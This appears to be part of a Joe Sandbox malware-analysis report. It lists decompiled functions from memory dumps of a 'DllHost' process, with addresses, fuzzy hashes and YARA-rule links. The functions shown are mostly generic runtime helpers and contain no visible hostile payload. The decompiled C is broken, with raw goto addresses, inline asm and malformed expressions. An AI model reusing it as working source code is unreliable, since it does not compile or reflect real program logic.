                                                                                                                                                              0x7ff7191c9d66
                                                                                                                                                              0x7ff7191c9d68
                                                                                                                                                              0x7ff7191c9d69
                                                                                                                                                              0x7ff7191c9d6a
                                                                                                                                                              0x7ff7191c9d6c
                                                                                                                                                              0x7ff7191c9d72
                                                                                                                                                              0x7ff7191c9d74
                                                                                                                                                              0x7ff7191c9dda
                                                                                                                                                              0x7ff7191c9ddc
                                                                                                                                                              0x7ff7191c9e1c
                                                                                                                                                              0x7ff7191c9e5e
                                                                                                                                                              0x7ff7191c9e5f
                                                                                                                                                              0x7ff7191c9e60
                                                                                                                                                              0x7ff7191c9e65
                                                                                                                                                              0x7ff7191c9e6a
                                                                                                                                                              0x7ff7191c9e6f
                                                                                                                                                              0x7ff7191c9e74
                                                                                                                                                              0x7ff7191c9e7e
                                                                                                                                                              0x7ff7191c9e84
                                                                                                                                                              0x7ff7191c9e87
                                                                                                                                                              0x7ff7191c9e8a
                                                                                                                                                              0x7ff7191c9e8e
                                                                                                                                                              0x7ff7191c9e92
                                                                                                                                                              0x7ff7191c9e96
                                                                                                                                                              0x7ff7191c9ea6
                                                                                                                                                              0x7ff7191c9ed6
                                                                                                                                                              0x7ff7191c9edc
                                                                                                                                                              0x7ff7191c9edf
                                                                                                                                                              0x7ff7191c9ee1
                                                                                                                                                              0x7ff7191c9ee4
                                                                                                                                                              0x7ff7191c9ee7
                                                                                                                                                              0x7ff7191c9eea
                                                                                                                                                              0x7ff7191c9eed
                                                                                                                                                              0x7ff7191c9ef5
                                                                                                                                                              0x7ff7191c9ef8
                                                                                                                                                              0x7ff7191c9efe
                                                                                                                                                              0x7ff7191c9f06
                                                                                                                                                              0x7ff7191c9f0a
                                                                                                                                                              0x7ff7191c9f21
                                                                                                                                                              0x7ff7191c9f2c
                                                                                                                                                              0x7ff7191c9f31
                                                                                                                                                              0x7ff7191c9f34
                                                                                                                                                              0x7ff7191c9f3b
                                                                                                                                                              0x7ff7191c9f3f
                                                                                                                                                              0x7ff7191c9f42
                                                                                                                                                              0x7ff7191c9f45
                                                                                                                                                              0x7ff7191c9f48
                                                                                                                                                              0x7ff7191c9f4b
                                                                                                                                                              0x7ff7191c9f4e
                                                                                                                                                              0x7ff7191c9f52
                                                                                                                                                              0x7ff7191c9f5a
                                                                                                                                                              0x7ff7191c9f5e
                                                                                                                                                              0x7ff7191c9f66
                                                                                                                                                              0x7ff7191c9f7b
                                                                                                                                                              0x7ff7191c9f86
                                                                                                                                                              0x7ff7191c9f8b
                                                                                                                                                              0x7ff7191c9f8e
                                                                                                                                                              0x7ff7191c9f95
                                                                                                                                                              0x7ff7191c9f98
                                                                                                                                                              0x7ff7191c9f9c
                                                                                                                                                              0x7ff7191c9f9f
                                                                                                                                                              0x7ff7191c9fa2
                                                                                                                                                              0x7ff7191c9fa8
                                                                                                                                                              0x7ff7191c9fb1
                                                                                                                                                              0x7ff7191c9fb3
                                                                                                                                                              0x7ff7191c9fb7
                                                                                                                                                              0x7ff7191c9fe6
                                                                                                                                                              0x7ff7191c9fec
                                                                                                                                                              0x7ff7191c9fef
                                                                                                                                                              0x7ff7191c9ff1
                                                                                                                                                              0x7ff7191c9ff4
                                                                                                                                                              0x7ff7191c9ff7
                                                                                                                                                              0x7ff7191c9ffa
                                                                                                                                                              0x7ff7191ca006
                                                                                                                                                              0x7ff7191ca008
                                                                                                                                                              0x7ff7191ca00c
                                                                                                                                                              0x7ff7191ca00f
                                                                                                                                                              0x7ff7191ca017
                                                                                                                                                              0x7ff7191ca02c
                                                                                                                                                              0x7ff7191ca037
                                                                                                                                                              0x7ff7191ca03c
                                                                                                                                                              0x7ff7191ca043
                                                                                                                                                              0x7ff7191ca046
                                                                                                                                                              0x7ff7191ca04a
                                                                                                                                                              0x7ff7191ca04d
                                                                                                                                                              0x7ff7191ca050
                                                                                                                                                              0x7ff7191ca053
                                                                                                                                                              0x7ff7191ca056
                                                                                                                                                              0x7ff7191ca062
                                                                                                                                                              0x7ff7191ca064
                                                                                                                                                              0x7ff7191ca068
                                                                                                                                                              0x7ff7191ca06b
                                                                                                                                                              0x7ff7191ca073
                                                                                                                                                              0x7ff7191ca088
                                                                                                                                                              0x7ff7191ca093
                                                                                                                                                              0x7ff7191ca098
                                                                                                                                                              0x7ff7191ca09b
                                                                                                                                                              0x7ff7191ca0a2
                                                                                                                                                              0x7ff7191ca0a5
                                                                                                                                                              0x7ff7191ca0a9
                                                                                                                                                              0x7ff7191ca0ac
                                                                                                                                                              0x7ff7191ca0af
                                                                                                                                                              0x7ff7191ca0b5
                                                                                                                                                              0x7ff7191ca0be
                                                                                                                                                              0x7ff7191ca0c0
                                                                                                                                                              0x7ff7191ca0c4
                                                                                                                                                              0x7ff7191ca0c7
                                                                                                                                                              0x7ff7191ca0cf
                                                                                                                                                              0x7ff7191ca0df
                                                                                                                                                              0x7ff7191ca0ef
                                                                                                                                                              0x7ff7191ca0f4
                                                                                                                                                              0x7ff7191ca0f7
                                                                                                                                                              0x7ff7191ca0fe
                                                                                                                                                              0x7ff7191ca102
                                                                                                                                                              0x7ff7191ca105
                                                                                                                                                              0x7ff7191ca108
                                                                                                                                                              0x7ff7191ca10b
                                                                                                                                                              0x7ff7191ca10e
                                                                                                                                                              0x7ff7191ca11a
                                                                                                                                                              0x7ff7191ca11c
                                                                                                                                                              0x7ff7191ca120
                                                                                                                                                              0x7ff7191ca123
                                                                                                                                                              0x7ff7191ca12b
                                                                                                                                                              0x7ff7191ca140
                                                                                                                                                              0x7ff7191ca14b
                                                                                                                                                              0x7ff7191ca150
                                                                                                                                                              0x7ff7191ca153
                                                                                                                                                              0x7ff7191ca15a
                                                                                                                                                              0x7ff7191ca161
                                                                                                                                                              0x7ff7191ca164
                                                                                                                                                              0x7ff7191ca16a
                                                                                                                                                              0x7ff7191ca16d
                                                                                                                                                              0x7ff7191ca170
                                                                                                                                                              0x7ff7191ca17f
                                                                                                                                                              0x7ff7191ca182
                                                                                                                                                              0x7ff7191ca186
                                                                                                                                                              0x7ff7191ca18d
                                                                                                                                                              0x7ff7191ca195
                                                                                                                                                              0x7ff7191ca1ac
                                                                                                                                                              0x7ff7191ca1b7
                                                                                                                                                              0x7ff7191ca1bc
                                                                                                                                                              0x7ff7191ca1bf
                                                                                                                                                              0x7ff7191ca1c6
                                                                                                                                                              0x7ff7191ca1cd
                                                                                                                                                              0x7ff7191ca1d0
                                                                                                                                                              0x7ff7191ca1d6
                                                                                                                                                              0x7ff7191ca1d9
                                                                                                                                                              0x7ff7191ca1dc
                                                                                                                                                              0x7ff7191ca1e3
                                                                                                                                                              0x7ff7191ca223
                                                                                                                                                              0x7ff7191ca229
                                                                                                                                                              0x7ff7191ca22f
                                                                                                                                                              0x7ff7191ca231
                                                                                                                                                              0x7ff7191ca237
                                                                                                                                                              0x7ff7191ca23f
                                                                                                                                                              0x7ff7191ca24e
                                                                                                                                                              0x7ff7191ca258
                                                                                                                                                              0x7ff7191ca25f
                                                                                                                                                              0x7ff7191ca265
                                                                                                                                                              0x7ff7191ca271

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9f882fc208cf204ef41d66c3476df4eab428f9526ec5a2a1cf7b50f0bc027fb2
                                                                                                                                                              • Instruction ID: b3b08bc2b7a81c5079e3f2c207a6c8e5ebe1164b699e234c1cd2618667cf51a9
                                                                                                                                                              • Opcode Fuzzy Hash: 9f882fc208cf204ef41d66c3476df4eab428f9526ec5a2a1cf7b50f0bc027fb2
                                                                                                                                                              • Instruction Fuzzy Hash: A8C16C722242548FE315CF3AE9506ABB7E0F79874CF819119EF8697B18D67CE811CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C9D4B Relevance: .3, Instructions: 349COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191C9D4B(void* __r8) {

				goto 0x191ca6a0;
				return 1;
			}



                                                                                                                                                              0x7ff7191c9d4e
                                                                                                                                                              0x7ff7191c9d58

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b82db1c8cdf9cd63b37094f3b6df88b552d52523cf8e68cddd7af27a8c0c31c0
                                                                                                                                                              • Instruction ID: 60632026651b449af161aec658c40ab6fa32025335d437981db48fd4d6cefd6d
                                                                                                                                                              • Opcode Fuzzy Hash: b82db1c8cdf9cd63b37094f3b6df88b552d52523cf8e68cddd7af27a8c0c31c0
                                                                                                                                                              • Instruction Fuzzy Hash: A9E184B35202A48BE344CF2A945CE6B77A8F748788FC39219DF8597750CB3CA825DB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F09E4 Relevance: .3, Instructions: 272COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                              			E00007FF77FF7191F09E4(void* __ecx, signed int __edx, void* __eflags, long long __rbx, long long __rcx, signed int __rdx, long long __rbp, void* __r9, long long _a16, long long _a24) {
				void* _v24;
				signed int _v40;
				char _v168;
				void* __rsi;
				void* _t70;
				unsigned int _t83;
				unsigned int _t86;
				signed char _t97;
				signed int _t99;
				void* _t110;
				signed long long _t145;
				signed long long _t146;
				long long _t150;
				void* _t178;
				signed long long _t180;
				signed long long _t181;
				signed long long _t182;
				signed long long _t183;
				long long _t185;
				void* _t188;
				signed short* _t205;
				void* _t208;

				_t186 = __rbp;
				_t110 = __eflags;
				_t99 = __edx;
				_a16 = __rbx;
				_a24 = __rbp;
				_t145 =  *0x192190a0; // 0x590452ce5669
				_t146 = _t145 ^ _t188 - 0x000000c0;
				_v40 = _t146;
				_t185 = __rcx;
				E00007FF77FF7191E5AC4(_t146, __rbx, __rdx, __rcx);
				r9d = 0x40;
				_t5 = _t146 + 0x98; // 0x98
				_t150 = _t5;
				asm("sbb edx, edx");
				if (E00007FF77FF7191E7BB8((_t99 & 0xfffff005) + 0x1002, _t110, _t146, _t150, _t185, _t185, __rbp,  &_v168) != 0) goto 0x191f0a53;
				 *(_t150 + 0x10) = 0;
				goto 0x191f0c91;
				_t70 = E00007FF77FF7191D87A4(_t146,  *((intOrPtr*)(_t150 + 8)));
				_t181 = _t180 | 0xffffffff;
				r13d = _t181 + 0x56;
				if (_t70 != 0) goto 0x191f0b1a;
				r9d = _t181 + 0x41;
				asm("sbb edx, edx");
				if (E00007FF77FF7191E7BB8(((_t99 & 0xfffff005) + 0x00001002 & 0xfffff002) + 0x1001, _t70, _t146, _t150, _t185, _t185, _t186,  &_v168) == 0) goto 0x191f0a46;
				if (E00007FF77FF7191D87A4(_t146,  *_t150) != 0) goto 0x191f0ac5;
				_t97 =  *(_t150 + 0x10) | 0x00000304;
				 *(_t150 + 0x10) = _t97;
				if ( *((intOrPtr*)(_t185 + (_t181 + 1) * 2)) != 0) goto 0x191f0ab9;
				goto 0x191f0afd;
				if ((_t97 & 0x00000002) != 0) goto 0x191f0b1a;
				if ( *((intOrPtr*)(_t150 + 0x14)) == 0) goto 0x191f0ba3;
				if (E00007FF77FF7191F3560(_t146,  *_t150,  *((intOrPtr*)(_t150 + 0x14))) != 0) goto 0x191f0ba3;
				 *(_t150 + 0x10) =  *(_t150 + 0x10) | 0x00000002;
				if ( *((intOrPtr*)(_t185 + (_t181 + 1) * 2)) != 0) goto 0x191f0af3;
				_t28 = _t150 + 0x258; // 0x2f0
				if (E00007FF77FF7191EF3D4(_t146, _t150, _t28, _t208, _t185, _t181 + 2) != 0) goto 0x191f0cb9;
				if (( *(_t150 + 0x10) & 0x00000300) == 0x300) goto 0x191f0c86;
				r9d = 0x40;
				asm("sbb edx, edx");
				if (E00007FF77FF7191E7BB8((((_t99 & 0xfffff005) + 0x00001002 & 0xfffff002) + 0x00001001 & 0xfffff002) + 0x1001, ( *(_t150 + 0x10) & 0x00000300) - 0x300, _t146, _t150, _t185, _t185, _t186,  &_v168) == 0) goto 0x191f0a46;
				if (E00007FF77FF7191D87A4(_t146,  *_t150) != 0) goto 0x191f0c86;
				_t83 =  *(_t150 + 0x10);
				asm("bts eax, 0x9");
				 *(_t150 + 0x10) = _t83;
				if ( *((intOrPtr*)(_t150 + 0x18)) == 0) goto 0x191f0bd3;
				asm("bts eax, 0x8");
				_t36 = _t150 + 0x258; // 0x2f0
				 *(_t150 + 0x10) = _t83;
				if ( *_t36 != 0) goto 0x191f0c86;
				_t182 = _t181 + 1;
				if ( *((intOrPtr*)(_t185 + _t182 * 2)) != 0) goto 0x191f0b95;
				goto 0x191f0c73;
				if (( *(_t150 + 0x10) & 0x00000001) != 0) goto 0x191f0b1a;
				if (E00007FF77FF7191F0E88(0x300,  *(_t150 + 0x10) & 0x00000001, _t185,  &_v168, _t185, _t186, _t181 + 2) == 0) goto 0x191f0b1a;
				 *(_t150 + 0x10) =  *(_t150 + 0x10) | 0x00000001;
				if ( *((intOrPtr*)(_t185 + (_t182 + 1) * 2)) != 0) goto 0x191f0bc4;
				goto 0x191f0afd;
				if ( *((intOrPtr*)(_t150 + 0x14)) == 0) goto 0x191f0c57;
				_t178 =  *_t150;
				if ( *((intOrPtr*)(_t178 + (_t182 + 1) * 2)) != 0) goto 0x191f0bde;
				if (0x300 !=  *((intOrPtr*)(_t150 + 0x14))) goto 0x191f0c57;
				if (E00007FF77FF7191F0E88(0x300, 0x300 -  *((intOrPtr*)(_t150 + 0x14)), _t185, _t178, _t185, _t186, _t182 + 1) != 0) goto 0x191f0c3b;
				_t205 =  *_t150;
				r8d = 0;
				if (_t205 == 0) goto 0x191f0c29;
				_t86 = _t178 - 0x41;
				if (_t86 - 0x19 <= 0) goto 0x191f0c21;
				if (( *_t205 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x191f0c29;
				r8d = r8d + 1;
				goto 0x191f0c0a;
				if (_t205[_t182 + 1] != 0) goto 0x191f0c2c;
				if (r8d == _t86) goto 0x191f0c86;
				asm("bts dword [ebx+0x10], 0x8");
				_t54 = _t150 + 0x258; // 0x2f0
				if ( *_t54 != 0) goto 0x191f0c86;
				_t183 = _t182 + 1;
				if ( *((intOrPtr*)(_t185 + _t183 * 2)) != 0) goto 0x191f0c4c;
				goto 0x191f0c73;
				asm("bts eax, 0x8");
				_t57 = _t150 + 0x258; // 0x2f0
				 *(_t150 + 0x10) = _t86;
				if ( *_t57 != 0) goto 0x191f0c86;
				if ( *((intOrPtr*)(_t185 + (_t183 + 1) * 2)) != 0) goto 0x191f0c6a;
				if (E00007FF77FF7191EF3D4(_t182 + 1, _t150, _t57, _t208, _t185, _t183 + 2) != 0) goto 0x191f0cb9;
				return E00007FF77FF7191D23B0( !( *(_t150 + 0x10) >> 2) & 0x00000001, 0x300, _v40 ^ _t188 - 0x000000c0);
			}

























                                                                                                                                                              0x7ff7191f09e4
                                                                                                                                                              0x7ff7191f09e4
                                                                                                                                                              0x7ff7191f09e4
                                                                                                                                                              0x7ff7191f09e4
                                                                                                                                                              0x7ff7191f09e9
                                                                                                                                                              0x7ff7191f09f9
                                                                                                                                                              0x7ff7191f0a00
                                                                                                                                                              0x7ff7191f0a03
                                                                                                                                                              0x7ff7191f0a0b
                                                                                                                                                              0x7ff7191f0a0e
                                                                                                                                                              0x7ff7191f0a13
                                                                                                                                                              0x7ff7191f0a1e
                                                                                                                                                              0x7ff7191f0a1e
                                                                                                                                                              0x7ff7191f0a2d
                                                                                                                                                              0x7ff7191f0a44
                                                                                                                                                              0x7ff7191f0a46
                                                                                                                                                              0x7ff7191f0a4e
                                                                                                                                                              0x7ff7191f0a5c
                                                                                                                                                              0x7ff7191f0a61
                                                                                                                                                              0x7ff7191f0a65
                                                                                                                                                              0x7ff7191f0a6b
                                                                                                                                                              0x7ff7191f0a74
                                                                                                                                                              0x7ff7191f0a82
                                                                                                                                                              0x7ff7191f0a97
                                                                                                                                                              0x7ff7191f0aab
                                                                                                                                                              0x7ff7191f0aad
                                                                                                                                                              0x7ff7191f0ab6
                                                                                                                                                              0x7ff7191f0ac1
                                                                                                                                                              0x7ff7191f0ac3
                                                                                                                                                              0x7ff7191f0ac8
                                                                                                                                                              0x7ff7191f0acd
                                                                                                                                                              0x7ff7191f0ae6
                                                                                                                                                              0x7ff7191f0aec
                                                                                                                                                              0x7ff7191f0afb
                                                                                                                                                              0x7ff7191f0afd
                                                                                                                                                              0x7ff7191f0b14
                                                                                                                                                              0x7ff7191f0b26
                                                                                                                                                              0x7ff7191f0b36
                                                                                                                                                              0x7ff7191f0b3f
                                                                                                                                                              0x7ff7191f0b54
                                                                                                                                                              0x7ff7191f0b69
                                                                                                                                                              0x7ff7191f0b6f
                                                                                                                                                              0x7ff7191f0b72
                                                                                                                                                              0x7ff7191f0b76
                                                                                                                                                              0x7ff7191f0b7c
                                                                                                                                                              0x7ff7191f0b7e
                                                                                                                                                              0x7ff7191f0b82
                                                                                                                                                              0x7ff7191f0b89
                                                                                                                                                              0x7ff7191f0b8f
                                                                                                                                                              0x7ff7191f0b95
                                                                                                                                                              0x7ff7191f0b9c
                                                                                                                                                              0x7ff7191f0b9e
                                                                                                                                                              0x7ff7191f0ba7
                                                                                                                                                              0x7ff7191f0bb7
                                                                                                                                                              0x7ff7191f0bbd
                                                                                                                                                              0x7ff7191f0bcc
                                                                                                                                                              0x7ff7191f0bce
                                                                                                                                                              0x7ff7191f0bd6
                                                                                                                                                              0x7ff7191f0bd8
                                                                                                                                                              0x7ff7191f0be5
                                                                                                                                                              0x7ff7191f0bea
                                                                                                                                                              0x7ff7191f0bf6
                                                                                                                                                              0x7ff7191f0bf8
                                                                                                                                                              0x7ff7191f0bfb
                                                                                                                                                              0x7ff7191f0c04
                                                                                                                                                              0x7ff7191f0c0e
                                                                                                                                                              0x7ff7191f0c15
                                                                                                                                                              0x7ff7191f0c1f
                                                                                                                                                              0x7ff7191f0c24
                                                                                                                                                              0x7ff7191f0c27
                                                                                                                                                              0x7ff7191f0c34
                                                                                                                                                              0x7ff7191f0c39
                                                                                                                                                              0x7ff7191f0c3b
                                                                                                                                                              0x7ff7191f0c40
                                                                                                                                                              0x7ff7191f0c4a
                                                                                                                                                              0x7ff7191f0c4c
                                                                                                                                                              0x7ff7191f0c53
                                                                                                                                                              0x7ff7191f0c55
                                                                                                                                                              0x7ff7191f0c57
                                                                                                                                                              0x7ff7191f0c5b
                                                                                                                                                              0x7ff7191f0c62
                                                                                                                                                              0x7ff7191f0c68
                                                                                                                                                              0x7ff7191f0c71
                                                                                                                                                              0x7ff7191f0c84
                                                                                                                                                              0x7ff7191f0cb8

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 959782435-0
                                                                                                                                                              • Opcode ID: ff1aeb44949af205a95401155f4dd7a9546dc799f3fe986cb4d6ec0f000291a7
                                                                                                                                                              • Instruction ID: 97767d2d3cbdc788438e37ad929534258e10b5acdac1bbe2a4cc1227499a60fa
                                                                                                                                                              • Opcode Fuzzy Hash: ff1aeb44949af205a95401155f4dd7a9546dc799f3fe986cb4d6ec0f000291a7
                                                                                                                                                              • Instruction Fuzzy Hash: 7FB1A562A18A4A82FB64EF21E5116B9A3B0EB44B6CF804135DF5D436C5EF3CE58ED350
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C9D43 Relevance: .3, Instructions: 262COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191C9D43(void* __r8) {

				goto 0x191ca6a0;
				return 1;
			}



                                                                                                                                                              0x7ff7191c9d4e
                                                                                                                                                              0x7ff7191c9d58

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dfd007fe73e979deb2d4c802359f8e873caeb369f6764306faf8e3151d782b3e
                                                                                                                                                              • Instruction ID: d74f902e2bc2ca61ff410a37cc984a6db4bea3c8e327cb5976203f3518958c61
                                                                                                                                                              • Opcode Fuzzy Hash: dfd007fe73e979deb2d4c802359f8e873caeb369f6764306faf8e3151d782b3e
                                                                                                                                                              • Instruction Fuzzy Hash: 64B196B36242B48BD354CF6AA858F5AB7A9F34878CF839119EF545BB10C738A415CF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C9D3B Relevance: .3, Instructions: 260COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191C9D3B(void* __r8) {

				goto 0x191ca6a0;
				return 1;
			}



                                                                                                                                                              0x7ff7191c9d4e
                                                                                                                                                              0x7ff7191c9d58

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9fd5d87d9798240c0b9f68abfa64747b0a0c87e6420d05011c788e3614bac757
                                                                                                                                                              • Instruction ID: c9acb988af4e44a4931a1731764a503d357ba1dc6b7bce6cbe12d4acb43a19f9
                                                                                                                                                              • Opcode Fuzzy Hash: 9fd5d87d9798240c0b9f68abfa64747b0a0c87e6420d05011c788e3614bac757
                                                                                                                                                              • Instruction Fuzzy Hash: 21B19E722202548FE325CF3EA9506ABB7A0F79878CF819119EFC697B14D63CE811CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191CF4C0 Relevance: .2, Instructions: 197COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191CF4C0(void* __rdx) {

				if (__rdx != 0) goto 0x191cf4cb;
				return 0;
			}



                                                                                                                                                              0x7ff7191cf4c6
                                                                                                                                                              0x7ff7191cf4ca

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c9dd38c1942786107e85044a11885bdd9be7aeceba9826a2b9a1af84bd4cf9cc
                                                                                                                                                              • Instruction ID: f9cd1ab03bbbf04436c34dedbc3fdbaba206adea9f82ee00632e676df7e646d6
                                                                                                                                                              • Opcode Fuzzy Hash: c9dd38c1942786107e85044a11885bdd9be7aeceba9826a2b9a1af84bd4cf9cc
                                                                                                                                                              • Instruction Fuzzy Hash: 9D71B2737301749BEB648B2EA514AA937A0F32A34DFC16115EB8447B81CF3EB925DB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E24EC Relevance: .1, Instructions: 126COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00007FF77FF7191E24EC(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed int* _t73;
				signed long long _t75;
				signed long long _t77;
				signed long long _t78;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 0x10)) = __rbx;
				 *((long long*)(_t117 + 0x18)) = _t115;
				 *((long long*)(_t117 + 0x20)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t73 =  *_t66;
				if (_t73 == 0) goto 0x191e2680;
				_t124 =  *0x192190a0; // 0x590452ce5669
				_t111 = _t124 ^  *_t73;
				_t75 = _t73[4] ^ _t124;
				asm("dec eax");
				asm("dec eax");
				asm("dec ecx");
				if ((_t73[2] ^ _t124) != _t75) goto 0x191e25f2;
				_t77 = _t75 - (_t124 ^  *_t73) >> 3;
				_t101 =  >  ? _t66 : _t77;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t77) + _t77;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x191e258e;
				_t7 = _t115 + 8; // 0x8
